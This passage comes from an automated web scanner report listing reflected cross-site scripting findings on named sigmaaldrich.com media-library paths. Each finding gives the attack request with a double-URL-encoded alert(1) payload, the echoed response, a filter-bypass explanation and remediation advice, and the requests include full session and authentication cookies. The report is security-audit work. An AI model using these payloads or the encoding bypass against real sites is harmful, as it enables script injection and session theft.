Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich8e978";alert(1)//4e81ba8cf40/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.486. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b5db%2522%253balert%25281%2529%252f%252f422503a5bc0 was submitted in the REST URL parameter 4. This input was echoed as 4b5db";alert(1)//422503a5bc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social4b5db%2522%253balert%25281%2529%252f%252f422503a5bc0/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social4b5db";alert(1)//422503a5bc0/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.487. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ba2f%2522%253balert%25281%2529%252f%252f139dfdef706 was submitted in the REST URL parameter 5. This input was echoed as 7ba2f";alert(1)//139dfdef706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/twitter-25x257ba2f%2522%253balert%25281%2529%252f%252f139dfdef706 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/twitter-25x257ba2f";alert(1)//139dfdef706","E404") ;
   </script>
...[SNIP]...

1.488. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3bd2%2522%253balert%25281%2529%252f%252f595f6da6914 was submitted in the REST URL parameter 1. This input was echoed as b3bd2";alert(1)//595f6da6914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb3bd2%2522%253balert%25281%2529%252f%252f595f6da6914/medialib/sigma-aldrich/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb3bd2";alert(1)//595f6da6914/medialib/sigma-aldrich/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.489. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf4%2522%253balert%25281%2529%252f%252fbc12d2c2272 was submitted in the REST URL parameter 2. This input was echoed as 34cf4";alert(1)//bc12d2c2272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib34cf4%2522%253balert%25281%2529%252f%252fbc12d2c2272/sigma-aldrich/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib34cf4";alert(1)//bc12d2c2272/sigma-aldrich/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.490. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93003%2522%253balert%25281%2529%252f%252f68f2c0b52 was submitted in the REST URL parameter 3. This input was echoed as 93003";alert(1)//68f2c0b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich93003%2522%253balert%25281%2529%252f%252f68f2c0b52/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
